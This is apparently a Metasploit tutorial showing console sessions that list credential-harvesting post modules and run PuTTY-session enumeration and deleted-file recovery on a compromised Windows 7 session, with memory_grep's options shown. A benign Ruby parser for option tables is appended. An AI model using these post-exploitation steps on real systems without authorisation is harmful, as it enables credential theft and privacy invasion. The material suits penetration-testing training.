[MAD-METASPLOIT] 0x33 - Using post module

Finding post modules

HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows

Matching Modules

   Name                                      Disclosure Date  Rank    Description
   ----                                      ---------------  ----    -----------
   post/multi/gather/apple_ios_backup                         normal  Windows Gather Apple iOS MobileSync Backup File Collection
   post/multi/gather/check_malware                            normal  Multi Gather Malware Verifier
   post/multi/gather/dbvis_enum                               normal  Multi Gather DbVisualizer Connections Settings
   post/multi/gather/dns_bruteforce                           normal  Multi Gather DNS Forward Lookup Bruteforce
   post/multi/gather/dns_reverse_lookup                       normal  Multi Gather DNS Reverse Lookup Scan
   post/multi/gather/dns_srv_lookup                           normal  Multi Gather DNS Service Record Lookup Scan
   post/multi/gather/enum_vbox                                normal  Multi Gather VirtualBox VM Enumeration
   post/multi/gather/env                                      normal  Multi Gather Generic Operating System Environment Settings
   post/multi/gather/filezilla_client_cred                    normal  Multi Gather FileZilla FTP Client Credential Collection
   post/multi/gather/find_vmx                                 normal  Multi Gather VMWare VM Identification
   post/multi/gather/firefox_creds                            normal  Multi Gather Firefox Signon Credential Collection
   post/multi/gather/jboss_gather                             normal  Jboss Credential Collector
   post/multi/gather/lastpass_creds                           normal  LastPass Vault Decryptor
   post/multi/gather/multi_command                            normal  Multi Gather Run Shell Command Resource File
   post/multi/gather/pgpass_creds                             normal  Multi Gather pgpass Credentials
   post/multi/gather/pidgin_cred                              normal  Multi Gather Pidgin Instant Messenger Credential Collection
   post/multi/gather/ping_sweep                               normal  Multi Gather Ping Sweep
   post/multi/gather/resolve_hosts                            normal  Multi Gather Resolve Hosts
   post/multi/gather/run_console_rc_file                      normal  Multi Gather Run Console Resource File
   post/multi/gather/skype_enum                               normal  Multi Gather Skype User Data Enumeration
   post/multi/gather/thunderbird_creds
   …snip…

Finding PuTTY sessions

post/windows/gather/enum_putty_saved_sessions

HAHWUL exploit(easyfilesharing_post) > use post/windows/gather/enum_putty_saved_sessions
HAHWUL post(enum_putty_saved_sessions) > show options

Module options (post/windows/gather/enum_putty_saved_sessions):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

HAHWUL post(enum_putty_saved_sessions) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
HAHWUL post(enum_putty_saved_sessions) > set SESSION 2
SESSION => 2
HAHWUL post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions
[-] No saved sessions found

[*] Looking for previously stored SSH host key fingerprints
[-] No stored SSH host keys found

[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed

   post/windows/gather/forensics/browser_history                normal  Windows Gather Skype, Firefox, and Chrome Artifacts
   post/windows/gather/forensics/duqu_check                     normal  Windows Gather Forensics Duqu Registry Check
   post/windows/gather/forensics/enum_drives                    normal  Windows Gather Physical Drives and Logical Volumes
   post/windows/gather/forensics/imager                         normal  Windows Gather Forensic Imaging
   post/windows/gather/forensics/nbd_server                     normal  Windows Gather Local NBD Server
   post/windows/gather/forensics/recovery_files                 normal  Windows Gather Deleted Files Enumeration and Recovering

File recovery module

HAHWUL post(driver_loader) > use post/windows/gather/forensics/recovery_files
HAHWUL post(recovery_files) > show options

Module options (post/windows/gather/forensics/recovery_files):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DRIVE    C:               yes       Drive you want to recover files from.
   FILES                     no        ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files.
   SESSION                   yes       The session to run this module on.
   TIMEOUT  3600             yes       Search timeout. If 0 the module will go through the entire $MFT.

HAHWUL post(recovery_files) > set SESSION 2
SESSION => 2
HAHWUL post(recovery_files) > run

[*] System Info - OS: Windows 7 (Build 7601, Service Pack 1)., Drive: C:
[*] $MFT is made up of 1 dataruns
[*] Searching deleted files in data run 1 ...

Memory grep

post/windows/gather/memory_grep

HAHWUL post(recovery_files) > use post/windows/gather/memory_grep
HAHWUL post(memory_grep) > show options

Module options (post/windows/gather/memory_grep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HEAP     false            no        Grep from heap
   PROCESS                   yes       Name of the process to dump memory from
   REGEX                     yes       Regular expression to search for with in memory
   SESSION                   yes       The session to run this module on.
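An added example, not part of the original post: a small Ruby parser for the column-aligned table that `show options` prints, which reports the required options that are still unset. That is exactly the condition behind the Msf::OptionValidateError shown earlier when `run` was issued before SESSION was set. The table text is constructed here from the recovery_files options above; the function names are my own, not Metasploit API.

```ruby
# Parse the column-aligned table printed by msfconsole's `show options`.
# Column boundaries are taken from the header line, because the
# "Current Setting" cell is blank for options that have not been set yet.
def parse_options_table(text)
  lines  = text.lines.map(&:rstrip).reject(&:empty?)
  header = lines.find { |l| l.lstrip.start_with?('Name') && l.include?('Required') }
  raise ArgumentError, 'no "Name ... Required" header found' unless header

  cur, req, desc = ['Current Setting', 'Required', 'Description'].map { |h| header.index(h) }
  options = []
  lines[(lines.index(header) + 2)..].each do |row| # +2 also skips the ---- underline
    name = row[0...cur].to_s.strip
    if name.empty? # a wrapped description continues on an indented line
      options.last[:description] += ' ' + row.strip unless options.empty?
      next
    end
    options << {
      name:        name,
      current:     row[cur...req].to_s.strip,
      required:    row[req...desc].to_s.strip == 'yes',
      description: row[desc..].to_s.strip
    }
  end
  options
end

# Options marked "yes" under Required that still have no Current Setting;
# these are what Msf::OptionValidateError complains about on `run`.
def missing_required_options(text)
  parse_options_table(text)
    .select { |o| o[:required] && o[:current].empty? }
    .map { |o| o[:name] }
end

# Constructed sample, laid out like the recovery_files table in this post.
RECOVERY_FILES_OPTIONS = <<~'TABLE'
Module options (post/windows/gather/forensics/recovery_files):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DRIVE    C:               yes       Drive you want to recover files from.
   FILES                     no        ID or extensions of the files to recover.
   SESSION                   yes       The session to run this module on.
   TIMEOUT  3600             yes       Search timeout. If 0 the module will go
                                       through the entire $MFT.
TABLE

puts "unset required options: #{missing_required_options(RECOVERY_FILES_OPTIONS).join(', ')}"
```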